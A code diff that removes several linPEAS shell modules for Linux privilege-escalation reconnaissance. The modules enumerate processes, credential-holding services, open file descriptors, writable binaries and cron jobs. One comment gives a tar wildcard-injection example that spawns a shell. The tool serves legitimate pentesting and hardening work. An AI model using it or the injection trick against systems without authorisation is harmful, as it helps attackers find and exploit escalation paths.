-    fi
-    
-    # Check AppArmor profile
-    if [ -r "/proc/$pid/attr/apparmor/current" ]; then
-      apparmor_profile=$(cat "/proc/$pid/attr/apparmor/current" 2>/dev/null)
-      if [ -n "$apparmor_profile" ] && [ "$apparmor_profile" != "unconfined" ]; then
-        if [ -n "$findings" ]; then
-          findings="$findings\n  └─ AppArmor profile: $apparmor_profile"
-        else
-          findings="AppArmor profile: $apparmor_profile"
-        fi
-      fi
-    fi
-
-    # Return findings if any
-    if [ -n "$findings" ]; then
-      echo "$findings"
-    fi
-  }
-
-  # Function to check for unusual mount namespaces
-  check_mount_namespace() {
-    local pid="$1"
-    local proc_user="$2"
-    local proc_cmd="$3"
-    local findings=""
-    
-    # Skip if we can't read the mountinfo
-    [ ! -r "/proc/$pid/mountinfo" ] && return
-    
-    # Get process mounts
-    proc_mounts=$(cat "/proc/$pid/mountinfo" 2>/dev/null | sort)
-    [ -z "$proc_mounts" ] && return
-
-    # Find mounts that the target process has but we don't
-    if [ -n "$current_mounts" ]; then
-      echo "$proc_mounts" | while read -r mount; do
-        if [ -n "$mount" ] && ! echo "$current_mounts" | grep -q "^$mount$"; then
-          mount_point=$(echo "$mount" | sed "s,.* - \(.*\),\1,")
-          if [ -z "$findings" ]; then
-            findings="Has additional mounts:"
-          fi
-          findings="$findings\n  └─ $mount_point"
-        fi
-      done
-    else
-      # If we can't get current mounts, just show all process mounts
-      findings="Has mounts:"
-      echo "$proc_mounts" | while read -r mount; do
-        if [ -n "$mount" ]; then
-          mount_point=$(echo "$mount" | sed "s,.* - \(.*\),\1,")
-          findings="$findings\n  └─ $mount_point"
-        fi
-      done
-    fi
-
-    # Return findings if any
-    if [ -n "$findings" ]; then
-      echo "$findings"
-    fi
-  }
-
-  # Function to check for unusual file descriptors
-  check_file_descriptors() {
-    local pid="$1"
-    local proc_user="$2"
-    local proc_cmd="$3"
-    local findings=""
-    
-    # Skip if we can't read the file descriptors
-    [ ! -r "/proc/$pid/fd" ] && return
-
-    # Check for interesting file descriptors
-    for fd in /proc/$pid/fd/*; do
-      # Skip if fd doesn't exist or we can't access it
-      [ ! -e "$fd" ] && continue
-      
-      # Get fd target
-      fd_target=$(readlink "$fd" 2>/dev/null)
-      [ -z "$fd_target" ] && continue
-
-      # Skip if target doesn't exist
-      [ ! -e "$fd_target" ] && continue
-
-      # Check if we can access the FD but not the target file
-      if [ -r "$fd" ] && [ ! -r "$fd_target" ]; then
-        if [ -z "$findings" ]; then
-          findings="Readable FD to unreadable file: $fd -> $fd_target"
-        else
-          findings="$findings\n  └─ Readable FD to unreadable file: $fd -> $fd_target"
-        fi
-      fi
-      if [ -w "$fd" ] && [ ! -w "$fd_target" ]; then
-        if [ -z "$findings" ]; then
-          findings="Writable FD to unwritable file: $fd -> $fd_target"
-        else
-          findings="$findings\n  └─ Writable FD to unwritable file: $fd -> $fd_target"
-        fi
-      fi
-    done
-
-    # Check for unusual number of file descriptors
-    fd_count=$(ls -1 "/proc/$pid/fd" 2>/dev/null | wc -l)
-    [ -z "$fd_count" ] && return
-
-    # If process has more than 100 file descriptors, it might be interesting
-    if [ "$fd_count" -gt 100 ]; then
-      if [ -z "$findings" ]; then
-        findings="Unusual number of FDs: $fd_count"
-      else
-        findings="$findings\n  └─ Unusual number of FDs: $fd_count"
-      fi
-    fi
-
-    # Return findings if any
-    if [ -n "$findings" ]; then
-      echo "$findings"
-    fi
-  }
-
-  if [ "$NOUSEPS" ]; then
-    print_ps | grep -v 'sed-Es' | sed -${E} "s,$Wfolders,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," | sed -${E} "s,$processesVB,${SED_RED_YELLOW},g" | sed "s,$processesB,${SED_RED}," | sed -${E} "s,$processesDump,${SED_RED},"
-    pslist=$(print_ps)
-  else
-    (ps fauxwww || ps auxwww | sort ) 2>/dev/null | grep -v "\[" | grep -v "%CPU" | while read psline; do
-      echo "$psline"  | sed -${E} "s,$Wfolders,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," | sed -${E} "s,$processesVB,${SED_RED_YELLOW},g" | sed "s,$processesB,${SED_RED}," | sed -${E} "s,$processesDump,${SED_RED},"
-      if [ "$(command -v capsh || echo -n '')" ] && ! echo "$psline" | grep -q "root"; then
-        cpid=$(echo "$psline" | awk '{print $2}')
-        caphex=0x"$(cat /proc/$cpid/status 2> /dev/null | grep CapEff | awk '{print $2}')"
-        if [ "$caphex" ] && [ "$caphex" != "0x" ] && echo "$caphex" | grep -qv '0x0000000000000000'; then
-          printf "  └─(${DG}Caps${NC}) "; capsh --decode=$caphex 2>/dev/null | grep -v "WARNING:" | sed -${E} "s,$capsB,${SED_RED},g"
-        fi
-      fi
-    done
-    pslist=$(ps auxwww)
-    echo ""
-  fi
-
-  # Additional checks for each process
-  print_2title "Processes with unusual configurations"
-  for pid in $(find /proc -maxdepth 1 -regex '/proc/[0-9]+' -printf "%f\n" 2>/dev/null); do
-    # Skip if process doesn't exist or we can't access it
-    [ ! -d "/proc/$pid" ] && continue
-    
-    # Get process user and command
-    proc_user=$(stat -c '%U' "/proc/$pid" 2>/dev/null)
-    proc_cmd=$(cat "/proc/$pid/cmdline" 2>/dev/null | tr '\0' ' ' | head -c 100)
-    [ -z "$proc_user" ] || [ -z "$proc_cmd" ] && continue
-    
-    # Run all checks and collect findings
-    sec_findings=$(check_security_context "$pid" "$proc_user" "$proc_cmd")
-    mount_findings=$(check_mount_namespace "$pid" "$proc_user" "$proc_cmd")
-    fd_findings=$(check_file_descriptors "$pid" "$proc_user" "$proc_cmd")
-    env_findings=$(check_env_vars "$pid" "$proc_user" "$proc_cmd")
-
-    # If any findings exist, print process info and findings
-    if [ -n "$env_findings" ] || [ -n "$sec_findings" ] || [ -n "$mount_findings" ] || [ -n "$fd_findings" ]; then
-      echo "Process $pid ($proc_user) - $proc_cmd"
-      [ -n "$env_findings" ] && echo "$env_findings"
-      [ -n "$sec_findings" ] && echo "$sec_findings"
-      [ -n "$mount_findings" ] && echo "$mount_findings"
-      [ -n "$fd_findings" ] && echo "$fd_findings"
-      echo ""
-    fi
-  done
-
-  echo ""
-fi
--- a/linPEAS/builder/linpeas_parts/4_procs_crons_timers_srvcs_sockets/2_Process_cred_in_memory.sh
+++ b/linPEAS/builder/linpeas_parts/4_procs_crons_timers_srvcs_sockets/2_Process_cred_in_memory.sh
@ -1,103 +0,0 @@
-# Title: Processes & Cron & Services & Timers - Processes with credentials inside memory
-# ID: PR_Process_cred_in_memory
-# Author: Carlos Polop
-# Last Update: 2024-03-19
-# Description: Processes with credentials inside memory and memory-mapped files
-# License: GNU GPL
-# Version: 1.2
-# Functions Used: echo_not_found, print_2title, print_info
-# Global Variables: $pslist, $SEARCH_IN_FOLDER, $processesDump, $nosh_usrs, $processesB, $knw_usrs, $rootcommon, $sh_usrs, $processesVB
-# Initial Functions:
-# Generated Global Variables: $line, $cred_files, $filename, $fd_target, $found_cred_files, $proc, $proc_cmd, $pid, $proc_user, $cred_processes, $seen_files
-# Fat linpeas: 0
-# Small linpeas: 1
-
-if ! [ "$SEARCH_IN_FOLDER" ]; then
-  print_2title "Processes with credentials in memory (root req)"
-  print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#credentials-from-process-memory"
-
-  # Common credential-storing processes
-  cred_processes="gdm-password gnome-keyring-daemon lightdm vsftpd apache2 sshd: mysql postgres redis-server mongod memcached elasticsearch jenkins tomcat nginx php-fpm supervisord vncserver xrdp teamviewer"
-
-  # Check for credential-storing processes
-  for proc in $cred_processes; do
-    if echo "$pslist" | grep -q "$proc"; then
-      echo "$proc process found (dump creds from memory as root)" | sed "s,$proc,${SED_RED},"
-    else
-      echo_not_found "$proc"
-    fi
-  done
-
-  # Check for processes with open handles to credential files
-  echo ""
-  print_2title "Opened Files by processes"
-  for pid in $(find /proc -maxdepth 1 -regex '/proc/[0-9]+' -printf "%f\n" 2>/dev/null); do
-    # Skip if process doesn't exist or we can't access it
-    [ ! -d "/proc/$pid" ] && continue
-    [ ! -r "/proc/$pid/fd" ] && continue
-
-    # Get process user and command
-    proc_user=$(stat -c '%U' "/proc/$pid" 2>/dev/null)
-    proc_cmd=$(cat "/proc/$pid/cmdline" 2>/dev/null | tr '\0' ' ' | head -c 100)
-    [ -z "$proc_user" ] || [ -z "$proc_cmd" ] && continue
-    
-    # Skip processes that start with "sed " or contain "linpeas.sh"
-    echo "$proc_cmd" | grep -q "^sed " && continue
-    echo "$proc_cmd" | grep -q "linpeas.sh" && continue
-
-    # Variable to store unique files for this process
-    seen_files=""
-    found_cred_files=""
-    
-    # Check for open credential files
-    for fd in /proc/$pid/fd/*; do
-      [ ! -e "$fd" ] && continue
-      fd_target=$(readlink "$fd" 2>/dev/null)
-      [ -z "$fd_target" ] && continue
-      [ "$fd_target" = "/dev/null" ] && continue
-      echo "$fd_target" | grep -q "^socket:" && continue
-      echo "$fd_target" | grep -q "^anon_inode:" && continue
-
-      # Only add if not already seen (using case to check)
-      case " $seen_files " in
-        *" $fd_target "*) continue ;;
-        *)
-          seen_files="$seen_files $fd_target"
-          if [ -z "$found_cred_files" ]; then
-            echo "Process $pid ($proc_user) - $proc_cmd"
-            echo "  └─ Has open files:"
-            found_cred_files="yes"
-          fi
-          echo "    └─ $fd_target"
-          ;;
-      esac
-    done
-  done | sed -${E} "s,\.(pem|key|cred|db|sqlite|conf|cnf|ini|env|secret|token|auth|passwd|shadow)$,\1${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," | sed -${E} "s,$processesVB,${SED_RED_YELLOW},g" | sed "s,$processesB,${SED_RED}," | sed -${E} "s,$processesDump,${SED_RED},"
-
-  # Check for processes with memory-mapped files that might contain credentials
-  echo ""
-  print_2title "Processes with memory-mapped credential files"
-  for pid in $(find /proc -maxdepth 1 -regex '/proc/[0-9]+' -printf "%f\n" 2>/dev/null); do
-    # Skip if process doesn't exist or we can't access it
-    [ ! -d "/proc/$pid" ] && continue
-    [ ! -r "/proc/$pid/maps" ] && continue
-
-    # Get process user and command
-    proc_user=$(stat -c '%U' "/proc/$pid" 2>/dev/null)
-    proc_cmd=$(cat "/proc/$pid/cmdline" 2>/dev/null | tr '\0' ' ' | head -c 100)
-    [ -z "$proc_user" ] || [ -z "$proc_cmd" ] && continue
-
-    # Check for memory-mapped files that might contain credentials
-    cred_files=$(grep -E '\.(pem|key|cred|db|sqlite|conf|cnf|ini|env|secret|token|auth|passwd|shadow)$' "/proc/$pid/maps" 2>/dev/null)
-    if [ -n "$cred_files" ]; then
-      echo "Process $pid ($proc_user) - $proc_cmd"
-      echo "  └─ Has memory-mapped credential files:"
-      echo "$cred_files" | while read -r line; do
-        filename=$(echo "$line" | sed "s,.*/\(.*\),\1,")
-        echo "    └─ $filename"
-      done
-    fi
-  done
-
-  echo ""
-fi
--- a/linPEAS/builder/linpeas_parts/4_procs_crons_timers_srvcs_sockets/3_Process_binaries_perms.sh
+++ b/linPEAS/builder/linpeas_parts/4_procs_crons_timers_srvcs_sockets/3_Process_binaries_perms.sh
@ -1,56 +0,0 @@
-# Title: Processes & Cron & Services & Timers - Process binaries permissions
-# ID: PR_Process_binaries_perms
-# Author: Carlos Polop
-# Last Update: 2024-03-19
-# Description: Check the permissions of the binaries of the running processes
-# License: GNU GPL
-# Version: 1.2
-# Functions Used: print_2title, print_info
-# Global Variables: $knw_usrs, $nosh_usrs, $NOUSEPS, $SEARCH_IN_FOLDER, $sh_usrs, $USER, $Wfolders
-# Initial Functions:
-# Generated Global Variables: $binW, $bpath, $pid
-# Fat linpeas: 0
-# Small linpeas: 1
-
-if ! [ "$SEARCH_IN_FOLDER" ]; then
-  if [ "$NOUSEPS" ]; then
-    print_2title "Binary processes permissions (non 'root root' and not belonging to current user)"
-    print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#processes"
-    
-    # Get list of writable binaries
-    binW=""
-    for pid in $(find /proc -maxdepth 1 -regex '/proc/[0-9]+' -printf "%f\n" 2>/dev/null); do
-      # Skip if process doesn't exist or we can't access it
-      [ ! -r "/proc/$pid/exe" ] && continue
-      
-      # Get binary path
-      bpath=$(readlink "/proc/$pid/exe" 2>/dev/null)
-      [ -z "$bpath" ] && continue
-      
-      # Check if binary is writable
-      if [ -w "$bpath" ]; then
-        if [ -z "$binW" ]; then
-          binW="$bpath"
-        else
-          binW="$binW|$bpath"
-        fi
-      fi
-    done
-
-    # Get and display binary permissions
-    for pid in $(find /proc -maxdepth 1 -regex '/proc/[0-9]+' -printf "%f\n" 2>/dev/null); do
-      # Skip if process doesn't exist or we can't access it
-      [ ! -r "/proc/$pid/exe" ] && continue
-      
-      # Get binary path
-      bpath=$(readlink "/proc/$pid/exe" 2>/dev/null)
-      [ -z "$bpath" ] && continue
-      
-      # Display binary permissions if file exists
-      if [ -e "$bpath" ]; then
-        ls -la "$bpath" 2>/dev/null
-      fi
-    done | grep -Ev "\sroot\s+root" | grep -v " $USER " | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" | sed -${E} "s,$binW,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_RED}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," | sed "s,root,${SED_GREEN},"
-    echo ""
-  fi
-fi
--- a/linPEAS/builder/linpeas_parts/4_procs_crons_timers_srvcs_sockets/4_Processes_PPID_different_user.sh
+++ b/linPEAS/builder/linpeas_parts/4_procs_crons_timers_srvcs_sockets/4_Processes_PPID_different_user.sh
@ -1,60 +0,0 @@
-# Title: Processes & Cron & Services & Timers - Process opened by other users
-# ID: PR_Processes_PPID_different_user
-# Author: Carlos Polop
-# Last Update: 2024-03-19
-# Description: Processes whose PPID belongs to a different user (not root)
-# License: GNU GPL
-# Version: 1.1
-# Functions Used: print_2title, print_info
-# Global Variables: $nosh_usrs, $NOUSEPS, $SEARCH_IN_FOLDER, $sh_usrs, $USER
-# Initial Functions:
-# Generated Global Variables: $ppid_user, $pid, $ppid, $user, $ppid_uid, $user_uid
-# Fat linpeas: 0
-# Small linpeas: 1
-
-if ! [ "$SEARCH_IN_FOLDER" ] && ! [ "$NOUSEPS" ]; then
-  print_2title "Processes whose PPID belongs to a different user (not root)"
-  print_info "You will know if a user can somehow spawn processes as a different user"
-  
-  # Function to get user by PID using /proc
-  get_user_by_pid() {
-    if [ -r "/proc/$1/status" ]; then
-      grep "^Uid:" "/proc/$1/status" 2>/dev/null | awk '{print $2}'
-    fi
-  }
-
-  # Function to get username by UID
-  get_username_by_uid() {
-    if [ -r "/etc/passwd" ]; then
-      grep "^[^:]*:[^:]*:$1:" "/etc/passwd" 2>/dev/null | cut -d: -f1
-    fi
-  }
-
-  # Find processes with PPID and user info, then filter those where PPID's user is different from the process's user
-  for pid in $(find /proc -maxdepth 1 -regex '/proc/[0-9]+' -printf "%f\n" 2>/dev/null); do
-    # Skip if process doesn't exist or we can't access it
-    [ ! -r "/proc/$pid/status" ] && continue
-    
-    # Get process user
-    user_uid=$(get_user_by_pid "$pid")
-    [ -z "$user_uid" ] && continue
-    user=$(get_username_by_uid "$user_uid")
-    [ -z "$user" ] && continue
-
-    # Get PPID
-    ppid=$(grep "^PPid:" "/proc/$pid/status" 2>/dev/null | awk '{print $2}')
-    [ -z "$ppid" ] || [ "$ppid" = "0" ] && continue
-
-    # Get PPID user
-    ppid_uid=$(get_user_by_pid "$ppid")
-    [ -z "$ppid_uid" ] && continue
-    ppid_user=$(get_username_by_uid "$ppid_uid")
-    [ -z "$ppid_user" ] && continue
-
-    # Check if users are different and PPID user is not root
-    if [ "$user" != "$ppid_user" ] && [ "$ppid_user" != "root" ]; then
-      echo "Proc $pid with ppid $ppid is run by user $user but the ppid user is $ppid_user" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED},"
-    fi
-  done
-  echo ""
-fi
--- a/linPEAS/builder/linpeas_parts/4_procs_crons_timers_srvcs_sockets/5_Files_open_process_other_user.sh
+++ b/linPEAS/builder/linpeas_parts/4_procs_crons_timers_srvcs_sockets/5_Files_open_process_other_user.sh
@ -1,64 +0,0 @@
-# Title: Processes & Cron & Services & Timers - Files opened by processes belonging to other users
-# ID: PR_Files_open_process_other_user
-# Author: Carlos Polop
-# Last Update: 2024-03-19
-# Description: Files opened by processes belonging to other users
-# License: GNU GPL
-# Version: 1.1
-# Functions Used: print_2title, print_info
-# Global Variables: $IAMROOT, $nosh_usrs, $SEARCH_IN_FOLDER, $sh_usrs, $USER
-# Initial Functions:
-# Generated Global Variables: $user_uid, $pid, $fd_target, $cmd, $user
-# Fat linpeas: 0
-# Small linpeas: 1
-
-if ! [ "$SEARCH_IN_FOLDER" ]; then
-  if ! [ "$IAMROOT" ]; then
-    print_2title "Files opened by processes belonging to other users"
-    print_info "This is usually empty because of the lack of privileges to read other user processes information"
-
-    # Function to get username by UID
-    get_username_by_uid() {
-      if [ -r "/etc/passwd" ]; then
-        grep "^[^:]*:[^:]*:$1:" "/etc/passwd" 2>/dev/null | cut -d: -f1
-      fi
-    }
-
-    # Check each process
-    for pid in $(find /proc -maxdepth 1 -regex '/proc/[0-9]+' -printf "%f\n" 2>/dev/null); do
-      # Skip if process doesn't exist or we can't access it
-      [ ! -r "/proc/$pid/status" ] && continue
-      [ ! -r "/proc/$pid/fd" ] && continue
-
-      # Get process user
-      user_uid=$(grep "^Uid:" "/proc/$pid/status" 2>/dev/null | awk '{print $2}')
-      [ -z "$user_uid" ] && continue
-      user=$(get_username_by_uid "$user_uid")
-      [ -z "$user" ] && continue
-
-      # Skip if process belongs to current user
-      [ "$user" = "$USER" ] && continue
-
-      # Get process command
-      cmd=$(cat "/proc/$pid/cmdline" 2>/dev/null | tr '\0' ' ' | head -c 100)
-      [ -z "$cmd" ] && continue
-
-      # Check file descriptors
-      for fd in /proc/$pid/fd/*; do
-        [ ! -e "$fd" ] && continue
-        fd_target=$(readlink "$fd" 2>/dev/null)
-        [ -z "$fd_target" ] && continue
-
-        # Skip if target doesn't exist or is a special file
-        [ ! -e "$fd_target" ] && continue
-        case "$fd_target" in
-          /dev/*|/proc/*|/sys/*) continue ;;
-        esac
-
-        echo "Process $pid ($user) - $cmd"
-        echo "  └─ Has open file: $fd_target" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED},"
-      done
-    done
-    echo ""
-  fi
-fi
--- a/linPEAS/builder/linpeas_parts/4_procs_crons_timers_srvcs_sockets/6_Different_procs_1min.sh
+++ b/linPEAS/builder/linpeas_parts/4_procs_crons_timers_srvcs_sockets/6_Different_procs_1min.sh
@ -1,30 +0,0 @@
-# Title: Processes & Cron & Services & Timers - Different processes 1 min
-# ID: PR_Different_procs_1min
-# Author: Carlos Polop
-# Last Update: 22-08-2023
-# Description: Different processes executed during 1 min
-# License: GNU GPL
-# Version: 1.0
-# Functions Used: print_2title, print_info
-# Global Variables: $nosh_usrs, $sh_usrs, $Wfolders
-# Initial Functions:
-# Generated Global Variables: $temp_file
-# Fat linpeas: 0
-# Small linpeas: 1
-
-
-if ! [ "$SEARCH_IN_FOLDER" ]; then
-  if ! [ "$FAST" ] && ! [ "$SUPERFAST" ]; then
-    print_2title "Different processes executed during 1 min (interesting is low number of repetitions)"
-    print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#frequent-cron-jobs"
-    temp_file=$(mktemp)
-    if [ "$(ps -e -o user,command 2>/dev/null)" ]; then 
-      for i in $(seq 1 1210); do 
-        ps -e -o user,command >> "$temp_file" 2>/dev/null; sleep 0.05; 
-      done;
-      sort "$temp_file" 2>/dev/null | uniq -c | grep -v "\[" | sed '/^.\{200\}./d' | sort -r -n | grep -E -v "\s*[1-9][0-9][0-9][0-9]" | sed -${E} "s,$Wfolders,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED},"; 
-      rm "$temp_file";
-    fi
-    echo ""
-  fi
-fi
--- a/linPEAS/builder/linpeas_parts/4_procs_crons_timers_srvcs_sockets/7_Cron_jobs.sh
+++ b/linPEAS/builder/linpeas_parts/4_procs_crons_timers_srvcs_sockets/7_Cron_jobs.sh
@ -1,250 +0,0 @@
-# Title: Processes & Cron & Services & Timers - Cron jobs and Wildcards
-# ID: PR_Cron_jobs
-# Author: Carlos Polop
-# Last Update: 2024-03-19
-# Description: Enumerate system cron jobs and check for privilege escalation vectors
-# License: GNU GPL
-# Version: 1.2
-# Functions Used: echo_not_found, print_2title, print_info
-# Global Variables: $cronjobsG, $nosh_usrs, $SEARCH_IN_FOLDER, $sh_usrs, $USER, $Wfolders, $cronjobsB, $PATH
-# Initial Functions:
-# Generated Global Variables: $cmd, $VAR, $file, $path, $user_crontab, $username, $job_id, $cron_dir, $crontab, $findings, $line, $finding, $bin
-# Fat linpeas: 0
-# Small linpeas: 1
-
-if ! [ "$SEARCH_IN_FOLDER" ]; then
-  print_2title "Check for vulnerable cron jobs"
-  print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#scheduledcron-jobs"
-
-  print_3title "Cron jobs list"
-  command -v crontab 2>/dev/null || echo_not_found "crontab"
-  crontab -l 2>/dev/null | tr -d "\r" | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED},"
-  command -v incrontab 2>/dev/null || echo_not_found "incrontab"
-  incrontab -l 2>/dev/null
-  ls -alR /etc/cron* /var/spool/cron/crontabs /var/spool/anacron 2>/dev/null | sed -${E} "s,$cronjobsG,${SED_GREEN},g" | sed "s,$cronjobsB,${SED_RED},g"
-  cat /etc/cron* /etc/at* /etc/anacrontab /var/spool/cron/crontabs/* /etc/incron.d/* /var/spool/incron/* 2>/dev/null | tr -d "\r" | grep -v "^#" | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE},"  | sed "s,root,${SED_RED},"
-  crontab -l -u "$USER" 2>/dev/null | tr -d "\r"
-  ls -lR /usr/lib/cron/tabs/ /private/var/at/jobs /var/at/tabs/ /etc/periodic/ 2>/dev/null | sed -${E} "s,$cronjobsG,${SED_GREEN},g" | sed "s,$cronjobsB,${SED_RED},g" #MacOS paths
-  atq 2>/dev/null
-  echo ""
-
-  print_3title "Checking for specific cron jobs vulnerabilities"
-
-
-
-  # Function to check if a binary is writable and executable
-  check_binary_perms() {
-    local bin="$1"
-    [ -z "$bin" ] && return
-    
-    # Skip if binary doesn't exist
-    [ ! -e "$bin" ] && return
-    
-    # Check if it's a regular file
-    [ ! -f "$bin" ] && return
-    
-    # Check if it's writable and executable
-    if [ -w "$bin" ]; then
-      echo "Writable binary: $bin"
-      ls -l "$bin" 2>/dev/null
-    fi
-  }
-
-  # Function to extract binary path from command
-  get_binary_path() {
-    local cmd="$1"
-    local bin=""
-    
-    # Try to get the first word of the command
-    bin=$(echo "$cmd" | awk '{print $1}')
-    [ -z "$bin" ] && return
-    
-    # If it's an absolute path, use it directly
-    if [ "$(echo "$bin" | cut -c1)" = "/" ]; then
-      echo "$bin"
-      return
-    fi
-    
-    # If it's a relative path, try to resolve it
-    if [ -e "$bin" ]; then
-      echo "$(pwd)/$bin"
-      return
-    fi
-    
-    # Try to find it in PATH
-    for path in $(echo "$PATH" | tr ':' ' '); do
-      if [ -x "$path/$bin" ]; then
-        echo "$path/$bin"
-        return
-      fi
-    done
-  }
-
-  # Function to check for privilege escalation vectors in a command
-  check_privesc_vectors() {
-    local cmd="$1"
-    local file="$2"
-    local findings=""
-    local bin=""
-
-    # Skip common false positives (mail commands, shell conditionals, variable assignments)
-    if echo "$cmd" | grep -qE '^(mail|echo|then|else|fi|if|for|while|do|done|case|esac|exit|return|break|continue|:|\[|test|\[\[|\]\]|true|false|source|\.|cd|pwd|export|unset|readonly|local|declare|typeset|alias|unalias|set|unset|shift|wait|trap|umask|ulimit|exec|eval|command|builtin|let|read|printf|^[[:space:]]*[A-Za-z0-9_]+[[:space:]]*[=:])'; then
-      return
-    fi
-
-    # Get the binary path
-    bin=$(get_binary_path "$cmd")
-    if [ -n "$bin" ]; then
-      check_binary_perms "$bin"
-    fi
-
-    # Check for wildcard injection vectors
-    # Attack: Using wildcards in tar/chmod/chown to execute arbitrary commands
-    # Example: tar cf archive.tar * (where * expands to --checkpoint=1 --checkpoint-action=exec=sh)
-    if echo "$cmd" | grep -qE '\*'; then
-      findings="${findings}POTENTIAL_WILDCARD_INJECTION: Command uses wildcards with potentially exploitable command\n"
-    fi
-
-    # Check for path hijacking vectors
-    # Attack: Using relative paths or commands without full path that can be hijacked
-    # Example: script.sh instead of /usr/bin/script.sh
-    if echo "$cmd" | grep -qE '^[[:space:]]*[^/][^[:space:]]*[[:space:]]'; then
-      # Skip common false positives like shell builtins, control structures, and variable assignments
-      # Also skip test commands ([ ]), logical operators (&& ||), and complex shell constructs
-      if ! echo "$cmd" | grep -qE '^[[:space:]]*(cd|\.|source|\./|if|then|else|fi|for|while|do|done|case|esac|exit|return|break|continue|:|\[[[:space:]]|test|\[\[|\]\]|true|false|export|unset|readonly|local|declare|typeset|alias|unalias|set|unset|shift|wait|trap|umask|ulimit|exec|eval|command|builtin|let|read|printf|[A-Za-z0-9_]+[[:space:]]*[=:]|&&|\|\||;|\(|\)|\{|\})'; then
-        findings="${findings}PATH_HIJACKING: Command uses relative path\n"
-      fi
-    fi
-
-    # Check for command injection vectors
-    # Attack: Using unquoted variables or command substitution that can be injected
-    # Example: echo $VAR or echo $(command)
-    if echo "$cmd" | grep -qE '\$\{?[A-Za-z0-9_]|\$\(|`'; then
-      findings="${findings}COMMAND_INJECTION: Command uses unquoted variables or command substitution\n"
-    fi
-
-    # Check for overly permissive commands
-    # Attack: Commands that can be used to escalate privileges
-    # Example: chmod 777, chown root, etc.
-    if echo "$cmd" | grep -qE '\b(chmod\s+[0-7]{3,4}|chown\s+root|chgrp\s+root|sudo|su |pkexec)\b'; then
-      findings="${findings}PERMISSIVE_COMMAND: Command modifies permissions or uses privilege escalation tools\n"
-    fi
-
-    # If any findings, print them
-    if [ -n "$findings" ]; then
-      echo "Potential privilege escalation in cron job:"
-      echo "  └─ File: $file"
-      echo "  └─ Command: $cmd"
-      if [ -n "$bin" ]; then
-        echo "  └─ Binary: $bin"
-      fi
-      echo "  └─ Findings:"
-      echo "$findings" | while read -r finding; do
-        [ -n "$finding" ] && echo "     * $finding"
-      done
-    fi
-  }
-
-  # Check system crontabs
-  #echo "Checking system crontabs..."
-  #for crontab in /etc/cron.d/* /etc/cron.daily/* /etc/cron.hourly/* /etc/cron.monthly/* /etc/cron.weekly/* /var/spool/cron/crontabs/* /etc/at* /etc/anacrontab /etc/incron.d/* /var/spool/incron/*; do
-  #  [ ! -f "$crontab" ] && continue
-  #  [ ! -r "$crontab" ] && continue
-
-  #  # Check if the file is writable
-  #  if [ -w "$crontab" ]; then
-  #    echo "Writable cron file: $crontab"
-  #  fi
-
-  #  # Check each line for privilege escalation vectors
-  #  while IFS= read -r line || [ -n "$line" ]; do
-  #    # Skip comments and empty lines
-  #    case "$line" in
-  #      \#*|"") continue ;;
-  #    esac
-
-  #    # Extract the command part (everything after the time specification)
-  #    cmd=$(echo "$line" | sed -E 's/^[^ ]+ [^ ]+ [^ ]+ [^ ]+ [^ ]+ //')
-  #    [ -z "$cmd" ] && continue
-
-  #    check_privesc_vectors "$cmd" "$crontab"
-  #  done < "$crontab"
-  #done
-
-  # Check user crontabs
-  #echo "Checking user crontabs..."
-  #if command -v crontab >/dev/null 2>&1; then
-  #  # Check current user's crontab
-  #  crontab -l 2>/dev/null | while IFS= read -r line || [ -n "$line" ]; do
-  #    case "$line" in
-  #      \#*|"") continue ;;
-  #    esac
-  #    cmd=$(echo "$line" | sed -E 's/^[^ ]+ [^ ]+ [^ ]+ [^ ]+ [^ ]+ //')
-  #    [ -z "$cmd" ] && continue
-  #    check_privesc_vectors "$cmd" "current user crontab"
-  #  done
-
-  #  # Check other users' crontabs if accessible
-  #  for user_crontab in /var/spool/cron/crontabs/*; do
-  #    [ ! -f "$user_crontab" ] && continue
-  #    [ ! -r "$user_crontab" ] && continue
-  #    username=$(basename "$user_crontab")
